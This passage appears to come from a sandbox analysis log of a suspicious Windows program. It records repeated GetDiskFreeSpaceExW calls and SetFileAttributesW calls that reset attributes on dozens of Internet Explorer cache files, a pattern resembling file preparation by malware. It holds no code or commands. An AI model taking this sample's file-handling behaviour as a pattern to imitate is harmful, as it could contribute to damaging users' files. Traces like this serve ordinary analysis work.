lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.987] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04ok[1].jpg", dwFileAttributes=0x80) returned 1 [0142.990] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.995] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04we[1].jpg", dwFileAttributes=0x80) returned 1 [0142.998] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.006] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[1].jpg", dwFileAttributes=0x80) returned 1 [0143.011] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.016] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[2].jpg", dwFileAttributes=0x80) returned 1 [0143.019] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.024] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0ATj[1].jpg", dwFileAttributes=0x80) returned 1 [0143.027] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.032] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0D8i[1].jpg", dwFileAttributes=0x80) returned 1 [0143.034] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.040] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0g7a[1].jpg", dwFileAttributes=0x80) returned 1 [0143.043] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.049] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0w1b[1].jpg", dwFileAttributes=0x80) returned 1 [0143.051] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.057] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0xLt[1].jpg", dwFileAttributes=0x80) returned 1 [0143.059] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.064] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBDWA22[1].jpg", dwFileAttributes=0x80) returned 1 [0143.068] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.073] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE7d3b[1].jpg", dwFileAttributes=0x80) returned 1 [0143.075] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.081] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE85ld[1].jpg", dwFileAttributes=0x80) returned 1 [0143.083] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.089] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdckp[1].jpg", dwFileAttributes=0x80) returned 1 [0143.091] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.096] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdMci[1].jpg", dwFileAttributes=0x80) returned 1 [0143.099] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.105] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdSLV[1].jpg", dwFileAttributes=0x80) returned 1 [0143.116] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.126] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe2Pd[1].jpg", dwFileAttributes=0x80) returned 1 [0143.129] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.137] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe4Oo[1].png", dwFileAttributes=0x80) returned 1 [0143.141] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.147] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe6Ew[1].jpg", dwFileAttributes=0x80) returned 1 [0143.150] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.155] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeFp3[1].jpg", dwFileAttributes=0x80) returned 1 [0143.158] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.163] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeGwU[1].jpg", dwFileAttributes=0x80) returned 1 [0143.166] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.171] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeUg0[1].jpg", dwFileAttributes=0x80) returned 1 [0143.174] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.180] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeZnr[1].jpg", dwFileAttributes=0x80) returned 1 [0143.182] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.188] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEf5Lq[1].jpg", dwFileAttributes=0x80) returned 1 [0143.191] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.203] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfwtU[1].jpg", dwFileAttributes=0x80) returned 1 [0143.206] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.211] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfzSd[1].jpg", dwFileAttributes=0x80) returned 1 [0143.216] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.221] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgCuQ[1].jpg", dwFileAttributes=0x80) returned 1 [0143.224] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.229] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgHzB[1].jpg", dwFileAttributes=0x80) returned 1 [0143.232] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.240] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[1].jpg", dwFileAttributes=0x80) returned 1 [0143.243] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.249] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[2].jpg", dwFileAttributes=0x80) returned 1 [0143.251] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.257] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIyL[1].jpg", dwFileAttributes=0x80) returned 1 [0143.259] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.265] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgkY6[1].jpg", dwFileAttributes=0x80) returned 1 [0143.267] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.273] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgLzV[1].jpg", dwFileAttributes=0x80) returned 1 [0143.276] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.285] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgUri[1].jpg", dwFileAttributes=0x80) returned 1 [0143.287] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.293] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgXBv[1].jpg", dwFileAttributes=0x80) returned 1 [0143.297] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.302] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgZME[1].jpg", dwFileAttributes=0x80) returned 1 [0143.305] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.309] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBghfVy[1].png", dwFileAttributes=0x80) returned 1 [0143.312] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.318] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBkwUr[1].png", dwFileAttributes=0x80) returned 1 [0143.320] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.325] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBlBV0U[1].png", dwFileAttributes=0x80) returned 1 [0143.328] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.334] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBzhWWE[1].jpg", dwFileAttributes=0x80) returned 1 [0143.337] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.347] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-2[1].jpg", dwFileAttributes=0x80) returned 1 [0143.350] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.360] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-4[1].jpg", dwFileAttributes=0x80) returned 1 [0143.364] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.369] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\browser[1].htm", dwFileAttributes=0x80) returned 1 [0143.372] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.390] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e4-190963-91cdfbc1[1].txt", dwFileAttributes=0x80) returned 1 [0143.394] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.409] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\eula_text[1].htm", dwFileAttributes=0x80) returned 1 [0143.412] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.418] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\f[1].txt", dwFileAttributes=0x80) returned 1 [0143.421] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.426] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\google_plus_16dp[1].png", dwFileAttributes=0x80) returned 1 [0143.429] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.439] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\index[1].htm", dwFileAttributes=0x80) returned 1 [0143.442] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.447] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\print[1].txt", 